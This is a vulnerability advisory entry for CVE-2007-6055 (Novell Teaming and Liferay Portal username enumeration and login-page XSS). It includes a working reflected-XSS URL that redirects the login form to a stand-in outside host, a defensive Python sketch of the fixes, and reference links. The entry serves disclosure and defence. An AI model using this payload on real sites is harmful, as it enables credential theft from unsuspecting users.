Novell Teaming User Enumeration and Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1113946
Vulnerability type: Cross-site scripting
Published: 2007-11-16
Updated: 2009-04-23
CVE ID: CVE-2007-6055
CNNVD-ID: CNNVD-200711-294
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/30774
https://cxsecurity.com/issue/WLB-2007110054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-294
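|Vulnerability details
Novell Teaming is a solution designed for team collaboration that includes a range of enterprise community networking and workflow features. Novell Teaming performs user authentication through the following login form: https://teaming.example.com/c/portal/login. The web application returns different responses for valid and invalid usernames (Please enter a valid login / Authentication failed), which allows an attacker to infer whether a specific username exists through dictionary or brute-force guessing. Novell Teaming does not properly validate or escape the p_p_state and p_p_mode parameters, so a remote attacker can carry out cross-site scripting attacks by submitting malicious requests.
|Exploit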
source: http://www.securityfocus.com/bid/26470/info

Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Liferay Portal 4.1.0 and 4.1.1 are vulnerable; other versions may also be affected.

http://www.example.com/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://www.example2.com%22%3C/script%3E%3Ca%20b=%22c
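A defensive sketch of the two fixes this entry implies, added here as an example and not taken from Novell Teaming or Liferay code: one generic failure response for known and unknown usernames, and HTML-escaping of the reflected `login` value before it is written back into the form. The user store, function names and page markup are assumptions constructed for the example.

```python
import hashlib
import hmac
import html

def _hash(password: str, salt: bytes) -> bytes:
    # Low iteration count keeps the sample fast; use a tuned value in production.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

# Constructed sample user store (hypothetical): username -> (salt, hash).
_SALT = b"constructed-salt"
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
# Dummy record so an unknown username costs the same hashing work as a known one.
_DUMMY = (_SALT, _hash("dummy-password", _SALT))

# One message for every failure: no "valid login" vs "authentication failed" split.
GENERIC_ERROR = "Authentication failed"

def authenticate(login: str, password: str) -> bool:
    salt, expected = USERS.get(login, _DUMMY)
    matches = hmac.compare_digest(_hash(password, salt), expected)
    # The membership check stops the dummy record from ever authenticating.
    return matches and login in USERS

def render_login_page(login: str, error: str = "") -> str:
    # quote=True also encodes " and ', so the value cannot close the attribute.
    safe_login = html.escape(login, quote=True)
    safe_error = html.escape(error, quote=True)
    return (
        '<form name="fm1" action="/c/portal/login" method="post">'
        f'<input name="login" type="text" value="{safe_login}">'
        '<input name="password" type="password">'
        f'<span class="error">{safe_error}</span>'
        "</form>"
    )

def handle_login(login: str, password: str) -> tuple[int, str]:
    if authenticate(login, password):
        return 200, "Welcome"
    # Same status, same message and same page shape for every failure.
    return 401, render_login_page(login, GENERIC_ERROR)

if __name__ == "__main__":
    # The login value from the URL above, percent-decoded.
    sample = '"><script>document.fm1.action="http://www.example2.com"</script><a b="c'
    print(handle_login(sample, "x")[1])
    print(handle_login("alice", "wrong")[0], handle_login("nouser", "wrong")[0])
```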
|References

Source: VUPEN
Name: ADV-2009-1048
Link: http://www.vupen.com/english/advisories/2009/1048
Source: SECTRACK
Name: 1022063
Link: http://www.securitytracker.com/id?1022063
Source: BUGTRAQ
Name: 20071115 PR07-02: XSS on Liferay Portal Enterprise 4.1.1 login page ('login' parameter)
Link: http://www.securityfocus.com/archive/1/archive/1/483777/100/0/threaded
Source: MISC
Link: http://www.procheckup.com/Vulnerability_PR07-02.php
Source: SECUNIA
Name: 34714
Link: http://secunia.com/advisories/34714
Source: OSVDB
Name: 38702
Link: http://osvdb.org/38702
Source: XF
Name: liferay-portal-login-xss(38503)
Link: http://xforce.iss.net/xforce/xfdb/38503
Source: BID
Name: 26470
Link: http://www.securityfocus.com/bid/26470
Source: SREASON
Name: 3379
Link: http://securityreason.com/securityalert/3379
Source: SECUNIA
Name: 27537
Link: http://secunia.com/advisories/27537